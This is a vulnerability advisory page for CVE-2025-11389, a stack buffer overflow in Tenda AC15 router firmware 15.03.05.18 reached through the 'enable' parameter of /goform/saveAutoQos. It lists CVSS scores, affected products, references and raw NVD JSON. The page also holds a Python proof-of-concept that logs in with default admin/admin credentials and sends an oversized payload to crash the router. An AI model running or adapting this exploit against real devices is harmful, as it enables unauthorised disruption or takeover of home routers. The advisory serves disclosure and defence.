CVE-2025-11389

Description

A security flaw has been discovered in Tenda AC15 15.03.05.18. Affected is an unknown function of the file /goform/saveAutoQos. Performing a manipulation of the argument enable results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC15 15.03.05.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-11389 - Tenda AC15 saveAutoQos Stack Buffer Overflow PoC
# Vulnerability: Stack-based buffer overflow via 'enable' parameter in /goform/saveAutoQos
# Affected: Tenda AC15 firmware 15.03.05.18

import requests
import sys

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
TARGET_PORT = 80
USERNAME = "admin"
PASSWORD = "admin"

# Buffer size to trigger overflow (adjust based on target)
BUFFER_SIZE = 512
# Return address placeholder (e.g., for redirecting execution)
RET_ADDRESS = b"\x41\x41\x41\x41"

def login(session, host, port, username, password):
    """Login to Tenda AC15 router web interface."""
    login_url = f"http://{host}:{port}/login/Auth"
    data = {
        "username": username,
        "password": password
    }
    try:
        resp = session.post(login_url, data=data, timeout=10)
        if resp.status_code == 200:
            print(f"[+] Login successful to {host}")
            return True
    except Exception as e:
        print(f"[-] Login failed: {e}")
    return False

def exploit(session, host, port):
    """Trigger stack buffer overflow via saveAutoQos endpoint."""
    target_url = f"http://{host}:{port}/goform/saveAutoQos"
    # Craft malicious 'enable' parameter to overflow stack buffer
    payload = b"A" * BUFFER_SIZE + RET_ADDRESS
    data = {
        "enable": payload.decode('latin-1')
    }
    print(f"[*] Sending exploit payload ({len(payload)} bytes) to {target_url}")
    try:
        resp = session.post(target_url, data=data, timeout=10)
        print(f"[*] Response status: {resp.status_code}")
        print(f"[+] Exploit sent. Check if device crashed or shell obtained.")
    except requests.exceptions.Timeout:
        print("[+] Target timed out - possible crash/overflow triggered!")
    except Exception as e:
        print(f"[+] Exception occurred (possible crash): {e}")

if __name__ == "__main__":
    session = requests.Session()
    if login(session, TARGET_HOST, TARGET_PORT, USERNAME, PASSWORD):
        exploit(session, TARGET_HOST, TARGET_PORT)
    else:
        print("[-] Cannot proceed without valid credentials")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11389
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11389
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11389/
[4] VulDB https://vuldb.com/cve/CVE-2025-11389
[5] https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/AC15/saveAutoQos.md
[6] https://vuldb.com/?ctiid.327316
[7] https://vuldb.com/?id.327316
[8] https://vuldb.com/?submit.664982
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11389", "sourceIdentifier": "[email protected]", "published": "2025-10-07T12:15:42.500", "lastModified": "2026-02-24T07:16:30.743", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Tenda AC15 15.03.05.18. Affected is an unknown function of the file /goform/saveAutoQos. Performing a manipulation of the argument enable results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:*", "matchCriteriaId": "56881C41-A993-45CC-BAE6-E9DE17FA56E2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:*", "matchCriteriaId": "B73E7C1C-F121-486A-8B15-E97EA0C219A5"}]}]}], "references": [{"url": "https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/AC15/saveAutoQos.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327316", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327316", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664982", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}